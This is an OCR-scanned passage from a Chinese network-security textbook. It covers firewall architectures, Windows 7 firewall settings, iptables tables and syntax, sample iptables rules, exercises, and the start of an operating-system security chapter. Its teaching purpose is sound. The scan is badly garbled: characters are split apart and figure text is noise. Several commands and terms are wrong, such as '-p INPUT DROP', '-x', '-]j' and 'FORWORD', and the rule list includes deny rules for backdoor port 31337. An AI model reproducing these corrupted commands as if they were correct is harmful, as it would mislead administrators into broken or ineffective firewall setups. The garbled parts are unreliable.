主机 做 防火 墙 ， 该 计算 机 至 少 有 两 个 网 络 接口 。 这 样 的 主机 可 以 充当 与 这 些 接口 相连 的 网 
络 之 间 的 路 由 器 ; 它 能 够 从 一 个 网 络 发 送 IP 数据 包 到 另 一 个 网 络 。 然 而 双 宿 主机 网 关 结 构 
禁止 这 种 发 送 功能 。IP 数据 包 从 一 个 网 络 (如 因特网 ) 并 不 是 直接 发 送 到 其 他 网 络 (如 内 部 
的 、 被 保护 的 网 络 )。 防 火 墙 内 部 的 系统 能 与 双 宿 主机 通信 ， 同 时 防火 墙 外 部 的 系统 (在 因 
特 网 上 ) 能 与 双 宿 主机 通信 ， 但 是 这 些 系统 不 能 直接 互相 通信 。 它 们 之 间 的 IP 通信 被 完全 
阻止 。 

双 宿 主机 网 关 的 防火 墙 体系 结构 是 相当 简单 的 : 双 宿 主机 网 关 位 于 两 者 之 间 ， 并 且 被 
连接 到 因特网 和 内 部 的 网 络 ， 如 图 5-5 所 示 。 


EC 一 是 一 
i 有 双 网 卡 的 
堡 驮 主机 


图 5-5 双 宿 主机 网 关 体系 结构 
5.3.3 ”被 屏蔽 主机 网 关 体系 结构 


双 宿 主机 网 关 体系 结构 提供 来 自 与 多 个 网 络 相连 的 主机 的 服务 (但 是 路 由 关闭 )， 而 被 
屏蔽 主机 网 关 体系 结构 使 用 一 个 单独 的 路 由 器 提供 来 自 仅 仅 与 内 部 的 网 络 相连 的 主机 的 服 
务 。 在 这 种 体系 结构 中 ， 主 要 的 安全 策略 是 数据 包 过 滤 ， 其 结构 如 图 5-6 所 示 。 


图 5-6 被 屏蔽 主机 网 关 体系 结构 
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在 屏蔽 的 路 由 器 上 的 数据 包 过 滤 是 按 这 样 一 种 方法 设置 的 : 堡垒 主机 是 因特网 上 的 主 
机 能 连接 到 内 部 网 络 上 的 系统 的 桥梁 (如 传送 进来 的 电子 邮件 )。 即 使 这 样 ， 也 仅 有 某 些 确 
定 类 型 的 连接 被 允许。 任何 外 部 的 系统 试图 访问 内 部 的 系统 或 服务 ， 将 必须 连接 到 这 人 台 堡 
鱼 主 机 上 。 因 此 ， 堡 又 主机 需要 拥有 高 等 级 的 安全 。 

数据 包 过 滤 也 允许 堡垒 主机 开放 可 允许 的 连接 (什么 是 “可 允许 ”将 由 用 户 站 点 的 安全 
策略 决定 ) 到 外 部 世界 。 在 屏蔽 的 路 由 器 中 ， 数 据 包 过 滤 配 置 可 以 按 下 列 策略 执行 。 

(1) 允许 其 他 的 内 部 主机 为 了 某 些 服务 与 因特网 上 的 主机 连接 ( 即 允许 那些 已 经 过 数据 
包 过 滤 的 服务 )。 

(2) 不 允许 来 自 内 部 主机 的 所 有 连接 (强迫 那些 主机 经 由 堡垒 主机 使 用 代理 服务 )。 

用 户 可 以 针对 不 同 的 服务 混合 使 用 这 些 手段 ， 某 些 服务 可 以 被 允许 直接 经 过 数据 包 过 
滤 ， 而 其 他 服务 可 以 被 允许 仅仅 间接 地 经 过 代理 。 这 完全 取决 于 用 户 实行 的 安全 策略 。 

因为 这 种 体系 结构 允许 数据 包 从 因特网 向 内 部 网 的 移动 ， 所 以 它 的 设计 比 没有 外 部 数 
据 包 能 到 达 内 部 网 络 的 双 宿主 机 网 关 体 系 结构 似乎 是 更 危险 。 实 际 上 ， 双 宿主 机 网 关 体 系 
结构 在 防备 数据 包 从 外 部 网 络 穿 过 内 部 的 网 络 也 容易 产生 失败 (因为 这 种 失败 类 型 是 完全 出 
乎 预料 的 ， 不 太 可 能 防备 黑客 侵袭 )。 进 而 言 之 ， 保 卫 路 由 器 比 保卫 主机 较 易 实现 ， 因 为 它 
提供 非常 有 限 的 服务 组 。 多 数 情况 下 ， 被 屏蔽 主机 网 关 体 系 结构 比 双 宿 主机 网 关 体 系 结构 
具有 更 好 的 安全 性 和 可 用 人 性。 

然而 ， 相 比 其 他 体系 结构 ， 被 屏蔽 网 关 体系 结构 也 有 一 些 缺 点 。 主 要 是 如 果 侵袭 者 没 
有 办 法 侵入 堡垒 主机 时 ， 而 且 在 堡垒 主机 和 其 余 的 内 部 主机 之 间 没 有 任何 保护 网 络 安全 的 
东西 存在 的 情况 下 ， 路 由 器 同样 出 现 一 个 单 点 失效 。 如 果 路 由 器 被 损害 ， 整 个 网 络 对 侵袭 
者 是 开放 的 。 


5.3.4 被 屏蔽 子 网 体系 结构 


它 是 在 内 部 网 络 和 外 部 网 络 (Intemet) 之 间 建 立 一 个 被 隔离 的 子 网 ， 用 两 台 分 组 过 滤 路 
由 器 将 这 一 子 网 分 别 与 内 部 网 络 和 外 部 网 络 分 开 。 在 很 多 实现 中 ， 有 两 个 包 过 滤 路 由 器 放 
在 子 网 的 两 端 ， 在 子 网 内 构成 一 个 “ 非 军事 区 (DMZ)”， 在 该 区 可 以 放置 供 外 网 访问 的 
Internet 公共 服务 器 ， 内 部 网 络 和 外 部 网 络 均 可 访问 被 屏蔽 的 子 网 ， 但 禁止 它们 穿越 被 屏蔽 
的 子 网 通信 ， 像 WWW 和 FTP 服务 器 可 放 在 DMZ 中 。 有 的 屏蔽 子 网 中 还 设 有 一 台 堡 公主 
机 作为 唯一 可 访问 节点 ， 如 图 5-7 所 示 。 














图 5-7 ”被 屏蔽 子 网 体系 结构 
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5.4 ”小 型 案例 实 训 
5.4.1 Windows 防火 墙 应 用 


防火 墙 的 作用 是 用 来 检查 网 络 或 Internet 的 交互 信息 ， 并 根据 一 定 的 规则 设置 阻止 或 
许可 这 些 信息 包 通 过 ， 从 而 实现 保护 计算 机 的 目的 。 从 Windows XP 开始 ，Windows 系统 
中 增加 了 名 为 “Internet 连接 防火 墙 ” 的 网 络 防火 墙 。 从 Windows XP SP2 开始 ， 该 防火 墙 
被 改名 为 “Windows 防火 墙 ”， 之 后 的 Windows Vista、Windows 7 以 及 Windows 2008 以 
后 的 服务 器 版 本 不 仅 包含 了 这 一 防火 墙 ， 还 包含 了 一 个 以 组 策略 形式 配置 的 “高 级 安全 
Windows 防火 墙 ”， 该 防火 墙 可 供 配置 的 功能 更 多 。 

Windows 防火 墙 为 基于 状态 检测 的 防火 墙 ， 即 只 有 在 Windows 防火 墙 确认 这 个 数据 包 
是 由 本 机 的 某 个 程序 请 求 的 ， 或 者 是 已 经 指定 为 允许 通过 的 未 请 求 的 流量 ， 才 会 允许 通 
过 。 如 果 收 到 的 数据 包 不 是 经 过 本 机 运行 的 程序 发 起 的 ， 而 是 直接 接收 到 的 (这 类 连接 称 为 
“未 经 主动 请 求 的 传 入 连接 ”)， 这 时 Windows 防火 墙 会 对 用 户 进 行 询 问 。 由 此 ， 
Windows 防火 墙 可 以 避免 那些 依赖 未 经 请 求 的 传 入 流量 来 攻击 计算 机 的 恶意 用 户 和 程序 。 
但 是 Windows 防火 墙 也 有 很 大 的 不 足 ， 即 无 法 直接 对 程序 的 网 络 访问 进行 控制 ， 例 如 无 法 
禁止 某 个 程序 主动 访问 网 络 。 

Windows 防火 墙 虽然 功能 没有 专业 的 防火 墙 强大 ， 但 是 对 于 普通 用 户 已 经 足够 使 用 
了 。 并 且 由 于 它 是 嵌入 系统 内 核 的 ， 所 以 相对 第 三 方 防火 墙 软件 ， 它 的 运行 更 加 稳定 ， 占 
用 系统 资源 更 少 。 


1. 启用 或 禁用 Windows 防火 墙 


在 安装 好 Windows 7 系统 之 后 ，Windows 防火 墙 默认 是 启用 状态 。 
选择 “开始 ”一 “程序 ”一 “控制 面板 ”一 “Windows 防火 墙 ” 菜单 命令 ， 打 开 
“Windows 防火 墙 ” 窗 口 ， 如 图 5-8 所 示 。 
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图 5-8 “Windows 防火 墙 ”窗口 
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Windows 7 中 的 防火 墙 支持 对 不 同 网 络 类 型 进行 独立 配置 ， 而 不 会 互相 影响 。 默 认 情 
况 下 ，Windows 7 自 带 3 个 配置 文件 ， 分 别 适 用 于 “专用 网 络 ”“ 公 用 网 络 ” 以 及 “ 域 网 
络 “( 只 有 加 入 域 的 计算 机 才 会 出 现 与 域 网 络 有 关 的 内 容 ) 。 其 中 家 庭 网 络 和 工作 网 络 同属 于 
私有 网 络 ， 或 者 叫 专用 网 络 。 

在 Windows 7 中 ， 如 果 有 多 个 可 用 的 网 络 连接 ， 那 么 系统 会 分 别针 对 每 个 连接 类 型 使 
用 相应 的 防火 墙 配置 文件 ， 使 得 不 同 的 网 络 可 以 受到 不 同 的 保护 ， 既 可 以 保证 安全 性 ， 也 
可 以 保证 易 用 性 。 

单 击 窗口 左 侧 的 “打开 或 关闭 Windows 防火 墙 ” 链接 ， 打 开 “ 自 定义 配置 ”窗口 ， 在 
此 界面 中 可 以 启用 或 关闭 Windows 防火 墙 ， 如 图 5-9 所 示 。 
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图 5-9 “ 自 定义 设置 ”窗口 

2 还 原 默 认 设置 

单 击 “Windows 防火 墙 ”窗口 中 的 “还 原 默认 设置 ”链接 ， 在 弹出 的 “还 原 默认 设 
置 ”窗口 中 单 击 “ 还 原 默认 设置 ”按钮 ，Windows 7 将 删除 所 有 的 网 络 防火 墙 配置 项 目 ， 
恢复 到 初始 状态 ， 如 图 5-10 所 示 。 

3. 配置 允许 程序 规则 

(CD 单 击 “Windows 防火 墙 ” 窗口 中 的 “允许 程序 或 功能 通过 Windows 防火 墙 ” 链 
接 ， 弹 出 “允许 的 程序 ”窗口 ， 如 图 5-11 所 示 。 在 窗口 中 选中 允许 的 程序 ， 单 击 “ 确 定 ” 
按钮 ， 设 置 允许 程序 列表 或 基本 服务 。 

(2) 选择 某 一 程序 ， 单 击 “ 详 细 信息 ”按钮 ， 可 以 查看 该 条 目 对 应 的 程序 名 称 和 安装 
路 径 等 信息 ， 同 时 还 可 以 查看 该 条 目 使 用 的 配置 文件 ， 如 图 5-12 所 示 。 
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图 5-11 “允许 的 程序 ”窗口 
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如 何 查看 和 编辑 所 有 属性 ? 














图 5-12 程序 属性 
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(3) 如 果 是 添加 自己 的 应 用 程序 许可 规则 ， 单 击 “ 人 允许 运行 另 一 程序 ”按钮 ， 弹 出 
“添加 程序 ”对 话 框 ， 选 择 要 添加 的 程序 ， 单 击 “ 添 加 ”按钮 ， 如 图 5-13 所 示 。 
Ee [E23 
5 








程序 中 ) : 











路 径 愉 ): C:\Program FilesVWinRARVWinRAR exe 


| 
| 
识 E% 了 8 小 程 库 有 何 罗 BS? 

可 以 选择 要 将 此 程序 添加 有 由 3 缩 位 置 类 型 。 

| ED 


























图 5-13 “添加 程序 ”对 话 框 
(4) 添加 后 如 果 需 要 删除 (比如 原 程序 已 经 邱 载 了 等 )， 需 要 在 “允许 的 程序 ”窗口 中 选 
择 对 应 的 程序 项 ， 再 单 击 “删除 ”按钮 。 在 “删除 程序 ”对 话 框 中 单 击 “ 是 ”按钮 ， 可 以 
从 Windows 防火 墙 中 删除 允许 的 程序 ， 如 图 5-14 所 示 。 但 是 系统 的 服务 项 目 是 无 法 删除 
的 ， 只 能 禁用 。 





@ 如 果 从 例外 列表 删除 "WinRAR', 它 可 能 停止 工作 。 要 暂时 禁用 它 ,请 











清除 复 迁 框 。 
您 仍然 理 得 除 亡 吗 ? 
| 





图 5-14 “删除 程序 ”对 话 框 

4. Windows 7 防火 墙 的 高 级 设置 

(1) 单 击 “Windows 防火 墙 ”窗口 中 的 “高 级 设置 ”链接 ， 弹 出 “高 级 安全 Windows 
防火 墙 ” 配置 界面 ， 如 图 5-15 所 示 。 

在 此 界面 中 可 以 查看 和 修改 高 级 安全 Windows 防火 墙 的 各 项 功能 。 

(2) “入 站 规则 ” 子 节点 下 可 以 看 到 所 有 控制 传 入 连接 的 规则 。 可 以 为 入 站 通信 或 可 
配置 规则 指定 计算 机 或 用 户 、 程 序 、 服 务 、 端 口 和 协议 。 可 以 指定 要 应 用 规则 的 网 络 适 配 
器 类 型 如 局 域 网 (LAN)、 无 线 、 远 程 访问 、 虚 拟 专用 网 络 (VPN) 连 接 或 者 所 有 类 型 。 还 可 以 
将 规则 配置 为 使 用 任意 配置 文件 或 仅 使 用 指定 配置 文件 时 应 用 。 


(iN. 
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加 和 让 区 册 法 这 接 、 
公用 配置 文件 

@ rinavs PHASER> 

© 最 上 与 规 R 下 区 本 的 入 让 连接 
CE 
加 tinow: 卫 人 坟 性 





AD 
计算 


机 之 间 的 身份 验证 通信 
i eet i ree 2 ee 


CE 
查看 和 创建 防火 


i Sa 


Er 
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(3) “出 站 规则 ” 子 节点 下 可 以 看 到 所 有 控制 传 出 连接 的 规则 ， 为 出 站 通信 创建 或 修 
改 规则 ， 功 能 同 入 站 规则 。 控 制 传 出 连接 是 高 级 安全 Windows 防火 墙 和 Windows 防火 墙 
的 最 主要 区 别 。 

(4) “连接 安全 规则 ” 子 节点 下 可 以 看 到 所 有 和 IPSec 有 关 的 规则 。 连 接 安全 包括 在 
两 台 计 算 机 开始 通信 之 前 对 它们 进行 身份 验证 ， 并 确保 在 两 台 计 算 机 之 间 发 送 的 信息 的 安 
全 性 。 高 级 安全 Windows 防火 墙 使 用 IPsec 实现 连接 安全 ， 方 式 是 通过 使 用 密 钥 、 身 份 验 
证 、 数 据 完整 性 和 数据 加 密 等 措施 。 要 创建 一 个 安全 规则 ， 只 需要 单 击 “ 连 接 安 全 规则 ” 
子 节点 ， 然 后 在 中 间 的 窗口 中 右 击 鼠标 ， 选 择 “ 新 建 规则 ”命令 ， 根 据 弹出 的 “新 建 连接 
安全 规则 向 导 ” 进 行 创建 。 使 用 新 建 连接 安全 规则 向 导 ， 可 以 创建 Intemet 协议 安全 性 
(IPSec) 规 则 ， 以 实现 不 同 的 网 络 安全 目标 。 向 导 中 已 经 预定 义 了 4 种 不 同 的 规则 类 型 ( 隔 
离 、 免 除 身份 验证 、 服 务 器 到 服务 器 和 隧道 )， 也 可 以 创建 自 定义 的 规则 。 

(5) “监视 ” 子 节点 下 可 以 看 到 “高 级 安全 Windows 防火 墙 ” 的 各 种 工作 状态 ， 可 以 
监视 计算 机 上 的 活动 防火 墙 规则 和 连接 安全 规则 ， 但 IPSec 策略 除外 。 

界面 的 中 间 窗 格 显示 “高 级 安全 Windows 防火 墙 ” 的 主要 内 容 ， 在 左 侧 控制 台 树 中 选 
择 不 同 的 子 节 点 ， 中 央 窗 格 中 会 显示 相应 的 内 容 。 

右 侧 的 操作 窗 格 列 出 与 当前 选中 的 节点 有 关 的 操作 ， 随 着 选择 的 子 节点 不 同 ， 提 供 的 
操作 会 有 所 变化 。 


5.4.2 ”开源 防火 墙 Linux iptables 应 用 





Linux 从 内 核 1.1 开始 ， 已 经 具有 包 过 滤 功 能 。 在 内 核 2.0 中 ，Linux 使 用 ipfwadm 来 
操作 内 核 包 过 滤 规 则 。 在 内 核 2.1 中 ，Linux 采用 ipchains 控制 内 核 包 过 滤 规 则 。 从 内 核 


/oa\. 
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2.4 开始 ， 则 使 用 实现 了 具有 包 过 滤 、 数 据 包 处 理 、 网 络 地 址 转换 等 防火 墙 功能 框架 的 
netfilteriptables。 虽 然 netfilter/iptables IP 信息 包 过 滤 系 统 被 称 为 单个 实体 ， 但 它 实 际 上 是 
由 两 个 组 件 netfilter 和 iptables 组 成 。netfilter 组 件 也 称 为 内 核 空间 (kerelspace)， 是 内 核 的 
一 部 分 ， 由 一 些 信息 包 过 滤 表 组 成 ， 这 些 表 中 包含 内 核 用 来 控制 信息 包 过 滤 处 理 的 规则 
集 。iptables 组 件 是 一 种 工具 ， 也 称 为 用 户 空间 (userspace)， 它 使 插入 、 修 改 和 除去 信息 包 
过 滤 表 中 的 规则 变 得 容易 。 

1. netfilter 中 的 表 


1) Filter 表 

Filter 表 是 默认 的 规则 表 ， 用 于 一 般 数 据 包 的 过 滤 。Filter 表 包 含 INPUT、OUTPUT 和 
FORWORD 三 个 标准 链 ， 内 核 处 理 的 每 个 数据 包 都 要 经 过 三 个 链 中 的 一 个 。 在 Filter 表 中 
只 允许 对 数据 包 进行 接受 或 丢弃 的 操作 ， 而 无 法 对 数据 包 进 行 更 改 。 

(1) INPUT 链 里 的 规则 用 于 处 理 目 的 地 址 是 本 地 主机 的 数据 包 。 

(2) OUTPUT 链 里 的 规则 用 于 处 理 从 本 地 主机 发 出 的 数据 包 。 

(3) FORWORD 链 里 的 规则 用 于 处 理 在 一 个 网 络 接口 收 到 的 ， 而 且 需 要 转发 到 另 一 个 
网 络 接口 的 所 有 数据 包 。 

2) Nat 表 

Nat 表 主 要 用 于 网 络 地 址 转换 NAT， 该 表 可 以 实现 一 对 一 、 一 对 多 和 多 对 多 的 NAT 
工作 ，iptables 就 是 使 用 该 表 实 现 共享 上 网 功能 的 。 该 表 包 含 PREROUTING、OUTPUT 和 
POSTROUTING 链 。 

(1) PREROUTING 链 是 在 包 刚 刚 到 达 防 火 墙 时 改变 它 的 目的 地 址 。 

(2) OUTPUT 链 是 改变 本 地 产生 的 包 的 目的 地 址 。 

(3) POSTROUTING 链 是 在 包 就 要 离开 防火 墙 之 前 改变 其 源 地 址 。 

3) Mangle 表 

Mangle 表 主 要 用 于 对 指定 的 包 进 行 修改 ， 因 为 某 些 特 殊 应 用 可 能 会 改写 数据 包 的 一 些 
传输 特性 ， 如 数据 包 的 TTL 和 TOS 等 ， 不 过 在 实际 应 用 中 该 表 的 使 用 率 不 高 。 该 表 包 含 
PREROUTING、POSTROUTING、INPUT、OUTPUT 和 PORWORD 五 个 链 。 

(1) PREROUTING 链 是 在 包 进入 防火 墙 以 后 、 路 由 判断 之 前 改变 包 。 

(2) POSTROUTING 链 是 在 所 有 路 由 判断 之 后 改变 包 。 

(3) OUTPUT 链 是 在 确定 包 的 目的 之 前 更 改 数据 包 。 

(4) INPUT 链 是 在 包 被 路 由 到 本 地 之 后 ， 但 在 用 户 空间 的 程序 看 到 它 之 前 改变 包 。 

(5) FORWORD 链 是 在 最 初 的 路 由 判断 之 后 、 最 后 一 次 更 改 包 的 目的 之 前 改变 数据 包 
包头 。 图 5-16 是 iptables 内 建 各 表 与 链 的 相关 性 。 

当 一 个 数据 包 转 给 netfilter 后 ，netfilter 会 按 上 面 的 流程 依次 比 对 每 一 张 表 。 如 果 数 据 
包 符 合 表 中 所 述 ， 则 进行 相应 的 处 理 。 


2. iptables 命令 


在 netfilteriptables 防火 墙 中 ， 使 用 iptables 命令 建立 数据 包 过 滤 的 规则 ， 并 将 其 添加 
到 内 核 空间 的 特定 数据 包 过 滤 表 内 的 链 中 。 
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5-16 “netfilter/iptables 防火 墙 对 数据 报 控制 流程 
iptables 命令 的 一 般 格式 为 : 


iptables [-t table] -CMD chain CRETIRIA -]j ACTION 


参数 功能 如 下 。 


(1) -t table: 用 于 指定 命令 应 用 于 哪个 iptables 内 置 表 。iptables 内 置 了 Filter, Nat, 
Mangle 三 张 表 ， 如 果 没 有 指定 ， 默 认 是 Filter。 

(2) -CMD: 用 于 指定 iptables 的 执行 方式 ， 包 括 插入 规则 、 删 除 规则 和 添加 规则 等 。 
常用 命令 选项 如 表 5-1 所 示 。 








表 5-1 命令 选项 
参 数 功 能 
-P 或 --policy< 链 名 > 定义 默认 策略 
-L 或 --list< 链 名 > 查看 iptables 规则 列表 


-A 或 --append< 链 名 > 


在 规则 列表 的 最 后 增加 一 条 规则 





- 或 --insert< 链 名 > 


在 指定 的 位 置 插入 一 条 规则 





-D 或 --delete< 链 名 > 


在 规则 列表 中 删除 一 条 规则 





-R 或 --replace< 链 名 > 


蔡 换 规则 列表 中 的 某 条 规则 





下 或 --flush< 链 名 > 


删除 表 中 的 所 有 规则 





-Z 或 --zero< 链 名 > 





将 表 中 所 有 链 的 计数 和 流量 计数 器 都 清 零 


(3) chain: 指定 规则 到 底 是 在 哪个 链 上 操作 的 ， 当 定义 策略 的 时 候 可 以 ， 选 项 如 表 5-2 


所 示 。 


/a0. 
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表 5-2 规则 选项 
参 数 功 能 

INPUT | 处 理 输入 包 的 规则 链 

OUTPUT | 处 理 输 出 包 的 规则 链 

FORWARD | 处 理 转发 包 的 规则 链 

PREROUTING 对 到 达 且 未 经 路 由 判断 的 包 进行 处 理 的 规则 链 

POSTROUTING 对 发 出 且 经 过 路 由 判断 的 包 进行 处 理 的 规则 链 

用 户 自 定义 链 是 由 Filter 表 内 置 链 来 调用 的 ， 它 是 针对 调用 链 获取 的 数据 包 进 行 处 理 的 规则 链 


(4) CRETIRIA: 匹配 模式 。 指 定数 据 包 与 规则 匹配 所 应 具有 的 特征 ， 包 括 源 地 址 、 目 
的 地 址 、 传 输 协议 (如 TCP、UDP、ICMP) 和 端口 号 (如 80、21、110) 等 。 匹 配 选 项 如 表 5-3 


所 示 。 


表 5-3 ”匹配 选项 


参 数 
-i 或 --in-interface< 网 络 接口 > 
-0 或 --out-interface< 网 络 接口 > 
-p 或 --porto< 协 议 类 型 > 
-s 或 --source< 源 地 址 或 子 网 > 


--sport< 源 端口 号 > 


-d 或 --destination< 目 标 地 址 与 子 网 > 


--dport< 目 标 端口 号 > 


功 能 
指定 数据 包 是 从 哪个 网 络 接口 进入 
指定 数据 包 是 从 哪个 网 络 接口 输出 
指定 数据 包 匹配 的 协议 ， 如 TCP、UDP 
指定 数据 包 匹 配 的 源 地 址 
指定 数据 包 匹 配 的 源 端口 号 ， 可 以 使 用 “起 始 端口 
号 : 结束 端口 号 ”的 格式 指定 一 个 范围 的 端口 
指定 数据 包 匹 配 的 目标 地 址 
指定 数据 包 匹 配 的 目标 端口 号 ， 可 以 使 用 “起 始 端 
口号 :结束 端口 号 ”的 格式 指定 一 个 范围 的 端口 


(5) -j ACTION: 动作 选项 ， 指 定 当 数 据 包 与 规则 匹配 时 ， 应 该 做 什么 操作 ， 如 接受 或 
丢弃 等 。 动 作 选 项 如 表 5-4 所 示 。 

















表 5-4 动作 选项 
参 数 功 能 
ACCEPT 接受 数据 包 
DROP 丢弃 数据 包 
i 将 数据 包 重 新 转向 本 机 或 另 一 台 主 机 的 某 个 端口 ， 通 常用 此 功能 实现 透明 代理 
或 对 外 开放 内 网 的 某 些 服务 
SNAT 源 地 址 转换 ， 即 改变 数据 包 的 源 地 址 
DNAT 目标 地 址 转换 ， 即 改变 数据 包 的 目的 地 址 
伪装 ， 即 常 说 的 NAT 技术 。MASQUERADE 只 能 用 于 ADSL 等 拨号 上 网 的 卫 
MASQUERADE IP | 伪装 ， 也 就 是 主机 的 卫 地 址 是 由 ISP 动态 分 配 的 ， 如 果 主 机 的 卫 地 址 是 静态 


固定 的 ， 就 要 使 用 SNAT 





LOG 





日 志 功 能 ， 将 符合 规则 的 数据 包 的 相关 信息 记录 在 日 志 中 ， 以 便 管理 员 进 行 分 


析 和 排 错 


.am. 
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注意 : iptables 对 所 有 选项 和 参数 都 区 分 大 小 写 。 
3. iptables 命令 用 法 举例 
安装 好 iptables 后 ， 可 以 直接 在 Linux 系统 提示 符 状态 下 ， 输 入 相应 的 iptables 命令 ， 


设置 防火 墙 规则 。 安 装 linux 时 不 管 是 否 启动 了 防火 墙 ， 如 果 想 配置 属于 自己 的 防火 墙 ， 
需要 清除 现在 filter 的 所 有 规则 。 


(13. 


[root@tp ~]# iptables -F  ”// 清 除 预 设 表 filter 中 的 所 有 规则 链 的 规则 
[rootetp ~]# iptables -x  // 清 除 预 设 表 filter 中 使 用 者 自 定 链 中 的 规则 
[rootetp ~]# iptables -L -n // 查 看 本 机 关于 IPTABLES 的 设置 情况 
Chain INPUT (policy ACCEPT) 

target prot opt source destination 

Chain FORWARD (policy ACCEPT) 

target prot opt source destination 

Chain OUTPUT (policy ACCEPT) 

target prot opt source destination 

[root@tp ~]# /etc/rc.d/init.d/iptables save 

// 写 到 /etc/sysconfig/iptables 文件 里 

[rootetp ~]# service iptables restart // 重 启 防火 墙 


[root@tp ~]# iptables -p INPUT DROP // 设 定 预 设 规则 INPUT DROP 
[root@tp ~]# iptables -p OUTPUT ACCEPT // 设 定 预 设 规则 OUTPUT ACCEPT 
[root@tp ~]# iptables -p FORWARD DROP // 设 定 预 设 规则 FORWARD DROP 


[root@tp ~]# iptables -A INPUT -p tcp --dport 22 -]j ACCEPT 
// 开 启 远 程 SSH 22 端口 


[root@tp ~]# iptables -A INPUT -p tcp --dport 80 -]j ACCEPT 
// 开 启 Web 服务 器 80 端口 


[root@tp ~]# iptables -A INPUT -p tcp --dport 110 -j ACCEPT 
// 开 启 邮寄 服务 器 110 端口 
[root@tp ~]# iptables -A INPUT -p tcp --dport 25 -]j ACCEPT 
// 开 启 邮寄 服务 器 25 端口 


[root@tp ~]# iptables -A INPUT -p tcp --dport 21 -j] ACCEPT 
// 开 启 FTP 服务 器 21 端口 
[root@tp ~]# iptables -A INPUT -p tcp --dport 20 -]j ACCEPT 
// 开 启 FTP 服务 器 20 端口 


[root@tp ~]# iptables -A INPUT -p tcp --dport 53 -]j ACCEPT 
// 开 启 DNS 服务 器 53 端口 


[rootetp ~]# iptables -A INPUT -p icmp -j ACCEPT // 人 允许 icmp 包 通 过 


IPTABLES -A INPUT -i lo -p all -j ACCEPT // 人 允许 loopback! 





[root@tp ~]# iptables -A OUTPUT -p tcp --sport 31337 -j DROP 


// 减 少 不 安 全 的 端口 连接 
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[root@tp ~]# iptables -A OUTPUT -p tcp --dport 31337 -] DROP 


// 减 少 不 安 全 的 端口 连接 
本 章 小 结 


本 章 介绍 了 防火 墙 的 概念 、 功 能 和 分 类 ， 并 对 防火 墙 的 主要 技术 包 过 滤 、 应 用 代理 和 
状态 检测 进行 了 详细 讲解 ， 并 对 不 同 技术 下 的 防火 墙 结构 进行 了 分 析 和 对 比 。 


习 题 
一 、 选 择 题 
1。 防火 墙 是 (。 )。 
A. 审计 内 外 网 间 数 据 的 硬件 设备 。 B. 审计 内 外 网 间 数据 的 软件 设备 
C. 审计 内 外 网 间 数 据 的 策略 D. 以 上 的 综合 


2. 不 属于 防火 墙 的 优点 是 ( 。 )。 
A. 防止 非 授 权 用 户 进 入 网 络 内 部 
B. 可 以 限制 网 路 服务 
C. 方便 地 监视 网 络 的 安全 性 并 报警 
D. 利用 NAT 技术 缓解 地 址 空间 的 短缺 
3. 关于 防火 墙 的 功能 ， 以 下 ( ”) 是 错误 的 。 
A. 防火 墙 可 以 检查 进出 内 部 网 的 通信 量 
B. 防火 墙 可 以 使 用 应 用 网 关 技 术 在 应 用 层 上 建立 协议 过 滤 和 转发 功能 
C. 防火 墙 可 以 使 用 过 滤 技 术 在 网 络 层 对 数据 包 进行 选择 
D. 防火 墙 可 以 组 织 来 自 内 部 的 威胁 和 攻击 
4. Tom 的 公司 申请 到 5 个 PP 地址， 如果 公司 的 20 台 主 机 都 能 连 到 Intemet 上 ,他 
需要 防火 墙 的 ( ) 功 能 。 


A. 假冒 他 地址 的 侦 测 B. 网 络 地 址 转换 技术 
C. 内 容 检查 技术 D. 基于 地 址 的 身份 认证 
5. 状态 检测 技术 在 OSI 的 ( ””) 工 作 ， 实 现 防火 墙 功 能 。 
A. 网 络 层 B. 表示 层 C. 应 用 层 D. 数据 链 路 层 


6. Smurf 攻击 结合 使 用 了 IP 欺骗 和 ICMP 回复 方法 使 大 量 网 络 传输 充斥 目标 系统 ， 
引起 目标 系统 拒绝 为 正常 系统 进行 服务 。 管 理 员 可 以 在 源 站 点 使 用 的 解决 办 法 是 (  )。 
A. 通过 使 用 防火 墙 阻止 这 些 分 组 进入 自己 的 网 络 
B. 关闭 与 这 些 分 组 的 URL 连接 
C. 使 用 防火 墙 的 包 过 滤 功 能 ， 保 证 网 络 中 的 所 有 传输 信息 都 具有 合法 的 源 地 址 
D. 安装 可 清除 客户 端木 马 程序 的 防 病毒 软件 模块 


二 、 操 作 题 
设计 一 条 防火 墙 安全 规则 ， 防 范 别 人 使 用 Telnet 登录 自己 的 计算 机 。 
[fsa\. 
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【项 目 要 点 】 


操作 系统 安全 的 概念 及 安全 评估 。 

Windows 安全 子 系统 的 构成 、 身 份 验 证 及 访问 控制 的 实现 。 
Windows 文件 系统 安全 实现 及 注册 表 的 访问 控制 。 
Linux 账号 管理 机 制 及 文件 权限 设置 。 

Windows 及 Linux 系统 日 志 的 查看 。 

【学 习 目 标 】 

掌握 NTFS 权限 设置 方法 。 

掌握 EFS 加 密 及 密 钥 备份 的 方法 。 

掌握 注册 表 保护 的 措施 和 方法 。 

掌握 账号 密码 保护 策略 的 设置 。 

掌握 Linux 系统 日 志 的 查看 方法 。 


6.1 操作 系统 安全 概述 
6.1.1 “操作 系统 安全 的 概念 


操作 系统 是 一 组 面向 机 器 和 用 户 的 程序 ， 是 应 用 软件 同系 统 硬件 的 接口 ， 其 目标 是 高 
效 地 、 最 大 限度 地 、 合 理 地 使 用 计算 机 资源 。 安 全 就 是 最 大 限度 地 减少 数据 和 资源 被 攻击 
的 可 能 性 。 操 作 系 统 安全 包括 对 系统 重要 资源 的 保护 和 控制 ， 即 只 有 经 过 授权 的 用 户 和 代 
表 该 用 户 运行 的 进程 才能 对 计算 机 系统 的 资源 进行 访问 。 所 谓 一 个 计算 机 系统 是 安全 的 ， 
是 指 该 系统 能 够 通过 特定 的 安全 功能 或 安全 服务 控制 外 部 对 系统 资源 的 访问 。 

操作 系统 内 的 一 切 活动 均 可 看 作 是 主体 对 计算 机 内 部 各 客体 的 访问 活动 。 操 作 系 统 中 
的 所 有 资源 均 可 视 为 客体 ， 对 客体 进行 访问 或 使 用 的 实体 称 为 主体 ， 如 操作 系统 中 的 用 户 
和 用 户 执 行 的 进程 均 是 主体 。 操 作 系 统 的 安全 依赖 于 一 些 具 体 实施 安全 策略 的 可 信 的 软件 
和 硬件 ， 这 些 软件 、 硬 件 和 负责 系统 安全 管理 的 人 员 一 起 组 成 了 系统 的 可 信任 计算 基 
(Trusted Computing Base，TCB)。TCB 是 系统 安全 的 基础 ， 它 通过 安全 策略 来 控制 主体 对 
客体 的 存 取 ， 达 到 保护 客体 安全 的 目的 。 

